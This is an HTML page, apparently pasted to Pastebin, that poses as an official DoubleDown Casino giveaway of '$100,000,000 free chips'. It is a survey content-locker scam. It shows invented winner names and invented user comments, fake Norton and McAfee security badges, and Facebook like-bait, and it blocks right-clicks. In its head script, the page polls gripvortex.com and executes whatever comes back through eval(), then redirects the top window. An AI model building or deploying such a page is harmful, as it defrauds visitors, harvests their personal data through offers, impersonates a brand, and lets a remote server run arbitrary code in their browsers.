dsinn21

html

Sep 5th, 2016
155
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.89 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en" style="height:100%;">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  5. <meta name="googlebot" content="noindex">
  6. <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
  7. <script type="text/javascript" src="https://gripvortex.com/jquery.tipsy.js"></script>
  8. <link rel="stylesheet" href="//netdna.bootstrapcdn.com/bootstrap/3.0.0-rc1/css/bootstrap.min.css">
  9. <link rel="stylesheet" href="//gripvortex.com/bootstrap3/css/bootstrap-glyphicons.css">
  10. <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  11. <link rel="icon" href="/favicon.ico" type="image/x-icon">
  12. <script language="JavaScript">
  13. $(function() {
  14. $('.tip_over_link').tipsy({offset: -3,gravity: 'w',fade: false,html: true,opacity: 0.95});
  15. });
  16. var timed_function;
  17. function Start_Ajax(){
  18. clearTimeout(timed_function);
  19. $('#offerlst').hide();
  20. $('#offerwait').show();
  21. timed_function = setTimeout("chkld();",20000);
  22. }
  23. function Back_Ajax(){
  24. $('#offerwait').hide();
  25. $('#offerlst').fadeIn('slow');
  26. }
  27. function chkld(){
  28. $.ajax({
  29. type: "POST",
  30. crossDomain: true,
  31. data: "a_t=86400&lid=209391",
  32. url: "https://gripvortex.com/ajax_check_url.php",
  33. success: function(msg){
  34. eval(msg);
  35. }
  36. });
  37. }
  38. function completed(url){
  39. top.location = url;
  40. }
  41. </script>
  42. <link href='https://fonts.googleapis.com/css?family=Open+Sans+Condensed' rel='stylesheet' type='text/css'>
  43. <style>
  44. /* ===== Tipsy ===== */
  45.  
  46. .tipsy { padding: 4px; font-size: 11px; position: absolute; z-index: 100000; }
  47.  
  48. .tipsy-inner { padding: 5px 7px 5px 8px; background-color: black; color: white; max-width: 300px; text-align: center; }
  49. .tipsy-inner { border-radius: 3px; -moz-border-radius:3px; -webkit-border-radius:3px; }
  50. .tipsy-arrow { position: absolute; background: url('https://gripvortex.com/images/tipsy.gif') no-repeat top left; width: 9px; height: 5px; }
  51. .tipsy-w { margin-left: 5px; }
  52. .tipsy-w .tipsy-arrow { top: 50%; margin-top: -4px; left: 0; width: 5px; height: 9px; }
  53.  
  54. body{
  55. background-color:white;
  56. font-size: 14px;
  57. }
  58.  
  59. .offerlst{
  60.  
  61. background-color:rgba(239,239,239,0.5);
  62.  
  63. border:1px solid white;
  64. padding:20px;
  65. border-radius:8px;
  66.  
  67. min-height: 80px;
  68. margin-bottom: 8px;
  69. font-size: 14px;
  70. }
  71. .link_a, .link_a:link{
  72.  
  73.  
  74. background-color: #F5F5F5;
  75. background-image: linear-gradient(to bottom, #FFFFFF, #E6E6E6);
  76. background-repeat: repeat-x;
  77. border-color: rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) #B3B3B3;
  78. border-image: none;
  79. border-radius: 4px 4px 4px 4px;
  80. border-style: solid;
  81. border-width: 1px;
  82. box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
  83. color: #333333;
  84. cursor: pointer;
  85. display: inline-block;
  86. font-size: 14px;
  87. line-height: 20px;
  88. margin-bottom: 0;
  89. padding: 4px 12px;
  90. text-align: center;
  91. text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
  92. vertical-align: middle;
  93.  
  94. font-weight: normal;
  95. text-decoration:none;
  96.  
  97.  
  98.  
  99. }
  100.  
  101. .link_a:hover{
  102. background-position: 0 -15px;
  103. transition: background-position 0.1s linear 0s;
  104. }
  105. .each_p_elm{
  106. margin: 3px 0;
  107.  
  108. padding: 3px;
  109. white-space:nowrap;
  110. }
  111.  
  112. /*!
  113. * Bootstrap v3.0.3 (http://getbootstrap.com)
  114. * Copyright 2013 Twitter, Inc.
  115. * Licensed under http://www.apache.org/licenses/LICENSE-2.0
  116. */
  117.  
  118. /*! normalize.css v2.1.3 | MIT License | git.io/normalize */
  119.  
  120. /*!
  121. * Bootstrap v3.0.3 (http://getbootstrap.com)
  122. * Copyright 2013 Twitter, Inc.
  123. * Licensed under http://www.apache.org/licenses/LICENSE-2.0
  124. */
  125.  
  126. /*! normalize.css v2.1.3 | MIT License | git.io/normalize */
  127.  
  128. [hidden],
  129. template {
  130. display: none;
  131. }
  132.  
  133. html {
  134. font-family: sans-serif;
  135. -webkit-text-size-adjust: 100%;
  136. -ms-text-size-adjust: 100%;
  137. }
  138.  
  139. body {
  140. margin: 0;
  141.  
  142. }
  143.  
  144. a {
  145. background: transparent;
  146. }
  147.  
  148. a:focus {
  149. outline: thin dotted;
  150. }
  151.  
  152. a:active,
  153. a:hover {
  154. outline: 0;
  155. }
  156.  
  157. h1 {
  158. margin: 0.67em 0;
  159. font-size: 2em;
  160. }
  161.  
  162. html {
  163. font-size: 62.5%;
  164. -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
  165. }
  166.  
  167. body {
  168. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  169. font-size: 14px;
  170. line-height: 1.428571429;
  171. color: #333333;
  172. background-color: #ffffff;
  173. }
  174.  
  175.  
  176.  
  177. a {
  178. color: #428bca;
  179. text-decoration: none;
  180. }
  181.  
  182. hr {
  183. margin-top: 20px;
  184. margin-bottom: 20px;
  185. border: 0;
  186. border-top: 1px solid #eeeeee;
  187. }
  188.  
  189. h1,
  190. h2,
  191. h3,
  192. h4,
  193. h5,
  194. h6,
  195. .h1,
  196. .h2,
  197. .h3,
  198. .h4,
  199. .h5,
  200. .h6 {
  201. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  202. font-weight: 500;
  203. line-height: 1.1;
  204. color: inherit;
  205. }
  206.  
  207. h1 small,
  208. h2 small,
  209. h3 small,
  210. h4 small,
  211. h5 small,
  212. h6 small,
  213. .h1 small,
  214. .h2 small,
  215. .h3 small,
  216. .h4 small,
  217. .h5 small,
  218. .h6 small,
  219. h1 .small,
  220. h2 .small,
  221. h3 .small,
  222. h4 .small,
  223. h5 .small,
  224. h6 .small,
  225. .h1 .small,
  226. .h2 .small,
  227. .h3 .small,
  228. .h4 .small,
  229. .h5 .small,
  230. .h6 .small {
  231. font-weight: normal;
  232. line-height: 1;
  233. color: #999999;
  234. }
  235.  
  236. h1,
  237. h2,
  238. h3 {
  239. margin-top: 20px;
  240. margin-bottom: 10px;
  241. }
  242.  
  243. h1 small,
  244. h2 small,
  245. h3 small,
  246. h1 .small,
  247. h2 .small,
  248. h3 .small {
  249. font-size: 65%;
  250. }
  251.  
  252. h4,
  253. h5,
  254. h6 {
  255. margin-top: 10px;
  256. margin-bottom: 10px;
  257. }
  258.  
  259. h4 small,
  260. h5 small,
  261. h6 small,
  262. h4 .small,
  263. h5 .small,
  264. h6 .small {
  265. font-size: 75%;
  266. }
  267.  
  268. h1,
  269. .h1 {
  270. font-size: 36px;
  271. }
  272.  
  273. h2,
  274. .h2 {
  275. font-size: 30px;
  276. }
  277.  
  278. h3,
  279. .h3 {
  280. font-size: 24px;
  281. }
  282.  
  283. h4,
  284. .h4 {
  285. font-size: 18px;
  286. }
  287.  
  288. h5,
  289. .h5 {
  290. font-size: 14px;
  291. }
  292.  
  293. h6,
  294. .h6 {
  295. font-size: 12px;
  296. }
  297.  
  298. p {
  299. margin: 0 0 10px;
  300. }
  301.  
  302.  
  303.  
  304. .dl_button {
  305. color: #ffffff;
  306. background-color: #428bca;
  307. border-color: #357ebd;
  308. }
  309.  
  310. .dl_button:hover {
  311. color: #ffffff;
  312. background-color: #3276b1;
  313. border-color: #285e8e;
  314. }
  315.  
  316.  
  317. .dl_button i{
  318. display:none;
  319. }
  320. audio,
  321. canvas,
  322. video {
  323. display: inline-block;
  324. }
  325.  
  326. audio:not([controls]) {
  327. display: none;
  328. height: 0;
  329. }
  330.  
  331. [hidden],
  332. template {
  333. display: none;
  334. }
  335.  
  336. html {
  337. font-family: sans-serif;
  338. -webkit-text-size-adjust: 100%;
  339. -ms-text-size-adjust: 100%;
  340. }
  341.  
  342. body {
  343. margin: 0;
  344.  
  345. }
  346.  
  347. a {
  348. background: transparent;
  349. }
  350.  
  351. a:focus {
  352. outline: thin dotted;
  353. }
  354.  
  355. a:active,
  356. a:hover {
  357. outline: 0;
  358. }
  359.  
  360. h1 {
  361. margin: 0.67em 0;
  362. font-size: 2em;
  363. }
  364.  
  365. html {
  366. font-size: 62.5%;
  367. -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
  368. }
  369.  
  370. body {
  371. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  372. font-size: 14px;
  373. line-height: 1.428571429;
  374. color: #333333;
  375. background-color: #ffffff;
  376. }
  377.  
  378. input,
  379. button,
  380. select,
  381. textarea {
  382. font-family: inherit;
  383. font-size: inherit;
  384. line-height: inherit;
  385. }
  386.  
  387. a {
  388. color: #428bca;
  389. text-decoration: none;
  390. }
  391.  
  392. .img-circle {
  393. border-radius: 50%;
  394. }
  395.  
  396. hr {
  397. margin-top: 20px;
  398. margin-bottom: 20px;
  399. border: 0;
  400. border-top: 1px solid #eeeeee;
  401. }
  402.  
  403. h1,
  404. h2,
  405. h3,
  406. h4,
  407. h5,
  408. h6,
  409. .h1,
  410. .h2,
  411. .h3,
  412. .h4,
  413. .h5,
  414. .h6 {
  415. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  416. font-weight: 500;
  417. line-height: 1.1;
  418. color: inherit;
  419. }
  420.  
  421. h1 small,
  422. h2 small,
  423. h3 small,
  424. h4 small,
  425. h5 small,
  426. h6 small,
  427. .h1 small,
  428. .h2 small,
  429. .h3 small,
  430. .h4 small,
  431. .h5 small,
  432. .h6 small,
  433. h1 .small,
  434. h2 .small,
  435. h3 .small,
  436. h4 .small,
  437. h5 .small,
  438. h6 .small,
  439. .h1 .small,
  440. .h2 .small,
  441. .h3 .small,
  442. .h4 .small,
  443. .h5 .small,
  444. .h6 .small {
  445. font-weight: normal;
  446. line-height: 1;
  447. color: #999999;
  448. }
  449.  
  450. h1,
  451. h2,
  452. h3 {
  453. margin-top: 20px;
  454. margin-bottom: 10px;
  455. }
  456.  
  457. h1 small,
  458. h2 small,
  459. h3 small,
  460. h1 .small,
  461. h2 .small,
  462. h3 .small {
  463. font-size: 65%;
  464. }
  465.  
  466. h4,
  467. h5,
  468. h6 {
  469. margin-top: 10px;
  470. margin-bottom: 10px;
  471. }
  472.  
  473. h4 small,
  474. h5 small,
  475. h6 small,
  476. h4 .small,
  477. h5 .small,
  478. h6 .small {
  479. font-size: 75%;
  480. }
  481.  
  482. h1,
  483. .h1 {
  484. font-size: 36px;
  485. }
  486.  
  487. h2,
  488. .h2 {
  489. font-size: 30px;
  490. }
  491.  
  492. h3,
  493. .h3 {
  494. font-size: 24px;
  495. }
  496.  
  497. h4,
  498. .h4 {
  499. font-size: 18px;
  500. }
  501.  
  502. h5,
  503. .h5 {
  504. font-size: 14px;
  505. }
  506.  
  507. h6,
  508. .h6 {
  509. font-size: 12px;
  510. }
  511.  
  512. p {
  513. margin: 0 0 10px;
  514. }
  515.  
  516.  
  517.  
  518. .dl_button {
  519. color: #ffffff;
  520. background-color:#D98E23;
  521. border-color: #000;
  522. }
  523.  
  524. .dl_button:hover {
  525. color: #000;
  526. background-color: #FEE570;
  527. border-color: #fff;
  528. }
  529.  
  530.  
  531. .dl_button i{
  532. display:none;
  533. }
  534. </style>
  535. <title>DoubleDown Casino Chips </title>
  536. </head>
  537. <body id="the_body" style="margin:0; height:100%; font-family: 'Open Sans Condensed', sans-serif;" oncontextmenu="return false;">
  538.  
  539. <!--Begin -->
  540.  
  541. <center>
  542.  
  543.  
  544. <table width="70%">
  545.  
  546. <tr valign="top">
  547. <td align="center" width="400">
  548.  
  549.  
  550. <div id="txtheader">
  551. <br>
  552. </div>
  553. <div id="smallTitle">
  554.  
  555. </div>
  556.  
  557. <table width="600">
  558. <tr valign="top">
  559. <td align="center" width="600">
  560.  
  561.  
  562.  
  563. <!-- Wrap -->
  564.  
  565. <div style="text-align:center">
  566. <div style="width:850px; position:block; margin:0px auto;">
  567. <div style=" background:#E9EAED; text-align:center; border:1px solid #fff; border-radius:0px; box-shadow:0px 0px 5px gray;">
  568.  
  569. <!-- Profile -->
  570.  
  571. <div style="width:100%;"><div style="background:#fff; border:5px solid white; border-radius:0px; width:150px; height:150px; position:absolute; margin-left:30px; margin-top:180px; box-shadow:0px 2px 5px #999; overflow:hidden;"><div style="background: url(http://i.imgur.com/4cFiJDG.jpg) no-repeat; background-size:140px auto; width:150px; height:150px;"></div></div></div>
  572.  
  573. <!-- Banner -->
  574.  
  575. <div style="width:100%;"><div style="background:#fff; border:0px solid white; border-radius:0px; box-shadow:0px 0px 2px #999; width:830px; margin:0px auto;"><div style="background:url(http://i.imgur.com/bcaiDwf.jpg) no-repeat; background-size:830px auto; padding:10px 10px; width:820px; height:auto; max-width:830px; height:250px; overflow:hidden;"></div>
  576.  
  577. <!-- Title -->
  578.  
  579. <div style="width:500px;background:#fff;border:0px solid white;margin-left:205px;"><h2 style=" font-family:Impact; color:#555; text-align:left; margin-top:10px; font-size:22px;">DoubleDown Casino $100,000,000 Chips Facebook and Mobile [Limited Promo]</h2><h2 style=" font-family:Arial; margin-left:3px; color: orange; text-align:left; font-size:18px; margin-top:-5px;">Welcome to the official DoubleDown Casino giveaway site!</h2><br/></div></div></div><br>
  580.  
  581. <div style="text-align: center;">
  582. <span style="font-family: Arial; font-size: 18px;">Congratulations! You are Today's Lucky Player - <b>
  583. <script language="javascript" type="text/javascript">// <![CDATA[
  584.  
  585. var today_date= new Date()
  586. var month=today_date.getMonth()
  587. var today=today_date.getDate()
  588. var year=today_date.getFullYear()
  589.  
  590. var months = new Array(
  591. "January",
  592. "February",
  593. "March",
  594. "April",
  595. "May",
  596. "June",
  597. "July",
  598. "August",
  599. "September",
  600. "October",
  601. "November",
  602. "December");
  603. //
  604. // ]]></script>
  605. <script language="javascript" type="text/javascript">// <![CDATA[
  606.  
  607. document.write(months[month]+" "+today+", "+year)
  608. //
  609. // ]]></script>
  610. </b> </span></div>
  611. <div style="text-align: center;">
  612. </div>
  613. <span style="display: block; text-align: center;"><img alt="IP" border="0" src="http://www.wieistmeineip.de/ip-address/?size=468x60" height="60" width="468" /></span>
  614.  
  615. <center><div id="smallTitle">
  616. <span style="color: #FF0000; font-weight:regular; font-size:15px;"><b>Early Promo - Limited Time Offer!</b></font><br><center><div id="google_translate_element"></div><script type="text/javascript">
  617. function googleTranslateElementInit() {
  618. new google.translate.TranslateElement({pageLanguage: 'en', layout: google.translate.TranslateElement.InlineLayout.SIMPLE}, 'google_translate_element');
  619. }
  620. </script><center><div id="google_translate_element"></div><script type="text/javascript">
  621. function googleTranslateElementInit() {
  622. new google.translate.TranslateElement({pageLanguage: 'en'}, 'google_translate_element');
  623. }
  624. </script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script></center>
  625. </div><br />
  626.  
  627.  
  628. </br
  629.  
  630. <center><span style="color: #black; font-weight:regular; font-size:16px;">
  631. <table border="0" style="width:80%;background-color: transparent;">
  632. <tr>
  633. <td> <center>
  634. <article><span style="font-size:16px;font-family: 'Open Sans Condensed', sans-serif;"><b>WHY DOUBLEDOWN CASINO CHIPS GIVEAWAY DOES THIS!</b><br>
  635. <center>
  636. <p>Chips Giveaway is project made by DoubleDown Casino for DDC players. We are team of online base developers and have our own way of buying chips from DoubleDown Casino site for very low prices. Because of this advantage we started Chips Giveaway Project. We reward our fans with DoubleDown Casino Chips after they get required amount of clicks and check out our sponsor advertisement. This way Chips Giveaway get enough coins to give our fans and make some profit to keep this project running.</td>
  637. </tr></table></center></center></center>
  638.  
  639. <p><font size="4" color="red">LIKE OUR FACEBOOK FANPAGE TO PREVENT ERRORS AND DAILY UPDATES</p></font>
  640. <center>
  641.  
  642.  
  643. <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FDoubledown-casino-free-codes%2F450332601831870&width=130&layout=button_count&action=like&show_faces=false&share=true&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
  644.  
  645. <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FD0ubledown-casino%2F1692656687643595&width=130&layout=button_count&action=like&show_faces=false&share=true&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
  646.  
  647. <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FDouble-downcasino%2F946159268807895&width=130&layout=button_count&action=like&show_faces=false&share=true&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:21px;" allowTransparency="true"></iframe>
  648.  
  649. <br>
  650. </center>
  651. <div class="offerlst">
  652.  
  653. <div id='padding'>
  654. <div id='offerbox'>
  655. <center>
  656.  
  657. <center><h5><b>DOUBLEDOWN CASINO DAILY GIVEAWAY CHIPS</b> ☛ <font color="red"><u><b>LIMITED TIME OFFER!</b></u></font> </strong></span></h5></center>
  658.  
  659. <div style="text-align: center;">
  660. <marquee align="top" bgcolor="#F6F6F7" direction="left" height="20" loop="infinite" style="font-size: 14px;" width="540">
  661. <b><i>LATEST UPDATE:</b></i> CONGRATULATIONS TO <b><img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Terri Breazeale |
  662. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Elsie Horn |
  663. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/gb.png'/> Kathy Arndt Self |
  664. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Kimberly Mulvey |
  665. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Marcus Eckwood |
  666. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/nl.png'/> Joe Cimolonski |
  667. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Catherine Nowosad |
  668. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Patty Scott |
  669. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/jp.png'/> Maria Sussman |
  670. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Carrie Lynn Cowan |
  671. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Anthony Avery |
  672. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Randall Gulley |
  673. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Catrina R. Williams |
  674. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Tara Onder |
  675. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Joan M Warden Heffner |
  676. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Linda Rogers Myser |
  677. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Lucinda Salinas-Flebotte |
  678. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Roe Massare |
  679. <img src='http://www.amperordirect.com/mm5/website_v3/images/flags/us.png'/> Kimberly Williams Smell | </b> FOR CLAIMING DOUBLEDOWN CASINO BONUS GIVEAWAYS. ENJOY YOUR FREE CHIPS!</marquee></div>
  680. <br>
  681. <center><span style="color: #f90000; font-size: 15px;"><b>Step 1: Click "Collect $100,000,000 Free Chips" And Choose 1 Question Below to Continue</b></span></center>
  682. <br />
  683. <center><span style="color: #f90000; font-size: 15px;"><b>Step 2: After Completing a Question Your Coins will Automatically awarded DoubleDown Casino</b></span></center>
  684. <br />
  685. <center><span style="color: #f90000; font-size: 15px;"><b> Step 3: Done! - All question is Easy It takes only 2 mins only! Try it Now!</b></span></center>
  686.  
  687.  
  688. <div class="separator" style="clear: both; text-align: center;">
  689. <img border="0" src="http://3.bp.blogspot.com/-ipMT6chXYk4/U_Q1sdLmlYI/AAAAAAAAAUQ/AwV2Y9hjV_s/s1600/eyesPointingDown.gif" height="70" width="120" /></div>
  690. <center>
  691. {%offers%}
  692. </center>
  693.  
  694.  
  695. </font>
  696.  
  697.  
  698. <div class="content">
  699. <div style="padding:20px;">
  700. <table width="100%">
  701. <tr valign="top">
  702. <td width="400">
  703. <center><h2><b>$100,000,000 Free Bonus Chips Daily!</b></h2></center>
  704. <center><h3>CLICK"<b>Collect $100,000,000 Free Chips</b>"to Continue</h3></center>
  705.  
  706. </div>
  707. <div class="content">
  708. <center>
  709. <img src="http://i.imgur.com/FpqjmBE.jpg" width="750" /></center><br><br>
  710.  
  711. <div style="padding:20px;">
  712. <table width="100%">
  713.  
  714.  
  715. <div align="center">
  716. <img src="http://oi60.tinypic.com/rm4c54.jpg" alt="Norton Secured - MakingCash PPD Network" /><img src="http://oi59.tinypic.com/n1cokz.jpg" alt="McAfee Secured - MakingCash PPD Network" /><img src="http://oi58.tinypic.com/1zx63qa.jpg" alt="Trustee Certified - MakingCash PPD Network" />
  717. </div></center></center>
  718.  
  719.  
  720. <p style="text-align: center;"><span style="font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px;">DoubleDown Casino Free Chips LTD. All Rights Reserved
  721. 2015.®</span><br style="margin: 0px; padding: 0px; border: 0px; outline: 0px; list-style: none; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 11px;" /><b style="margin: 0px; padding: 0px; border: 0px; outline: 0px; list-style: none; font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 10px; color: #364149;"><span style="margin: 0px; padding: 0px; border: 0px; outline: 0px; list-style: none; color: #3b5998;">HOME | OUR GAMES | ABOUT US | SUPPORT | CONTACT | PRIVACY POLICY</span></b></p>
  722. </p>
  723.  
  724.  
  725. <span style=font-size:13px;"><div class="message_box" style="border-top-width: 1px; border-top-style: solid; border-top-color: rgb(204, 204, 204); padding: 10px 0px; font-weight: bold; border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(204, 204, 204);"><div style="float: right; color: rgb(59, 89, 152); text-decoration: none; cursor: pointer;"onclick="JavaScript:alert('Sorry! You dont have permission to leave a comment. You must claim bonus before you can leave your comment.')" >Add a comment</div>985 Comments </div><div class="message_box" style="border-top-style: none; padding: 10px 20px;">
  726.  
  727. <div style="clear: both; height: 1px;"></div></div>
  728.  
  729. <span style="font-size:25px;font-family: 'Open Sans Condensed', sans-serif;"><b>Recent Comments :</b></span><br/>
  730.  
  731. <br/><img src='http://i.picresize.com/images/2014/05/28/bvsZW.png' id='profile'>
  732. <span style="font-size:20px;font-family: 'Open Sans Condensed', sans-serif;"><b>Hebols</b>
  733. <font style='font-size:12px;color:#999;float:right'> <i>2 mins ago</i></font></span><br/>
  734.  
  735.  
  736. <span style="font-size:16px;font-family: 'Open Sans Condensed', sans-serif;">Thank you for this HUGE giveaway. More power to you guys.<br/>...<br/>
  737.  
  738. <br/><img src='http://i.picresize.com/images/2014/05/28/Lqv42.png' id='profile'>
  739. <span style="font-size:20px;font-family: 'Open Sans Condensed', sans-serif;"><b>JohnW</b>
  740. <font style='font-size:12px;color:#999;float:right'> <i>5 mins ago</i></font></span><br/>
  741. This works! Just added $100million to my account. Thanks<br/>...<br/>
  742. <br/><img src='http://i.picresize.com/images/2014/05/28/9u8kn.png' id='profile'>
  743. <span style="font-size:20px;font-family: 'Open Sans Condensed', sans-serif;"><b>Lilibeth</b>
  744. <font style='font-size:12px;color:#999;float:right'> <i>8 mins ago</i></font></span><br/>
  745. I really enjoy your company. thanks for this wonderful giveaway.<br/>...<br/>
  746.  
  747. <br/><img src='http://i.picresize.com/images/2014/05/28/CwiH9.png' id='profile'>
  748. <span style="font-size:20px;font-family: 'Open Sans Condensed', sans-serif;"><b>Stacey</b>
  749. <font style='font-size:12px;color:#999;float:right'> <i>11 mins ago</i></font></span><br/>
  750. Thank you so much. you are awesome guys. Wish you all the best.<br/>...<br/>
  751.  
  752. <br/><img src='http://i.picresize.com/images/2014/05/28/GzahH.png' id='profile'>
  753. <span style="font-size:20px;font-family: 'Open Sans Condensed', sans-serif;"><b>Choknuts</b>
  754. <font style='font-size:12px;color:#999;float:right'> <i>14 mins ago</i></font></span><br/>
  755. working.. offer was easy, no complaints from me :) just make sure you put in real data for the offer or they wont complete.<br/>...<br/><font style='font-size:12px;color:#999;float:right'> <i>5 of 985</i></font><br/>
  756.  
  757.  
  758. <div style="font-family:Arial;font-size:13px;color:#999;">
  759. <div style="text-align:center"><span style="font-size:14px;">© 2015,DoubleDown Casino - Free Slots , All rights reserved. </span></div>
  760. </div>
  761.  
  762. <!--End -->
  763.  
  764.  
  765. </body>
  766. </html>
Add Comment
Please, Sign In to add comment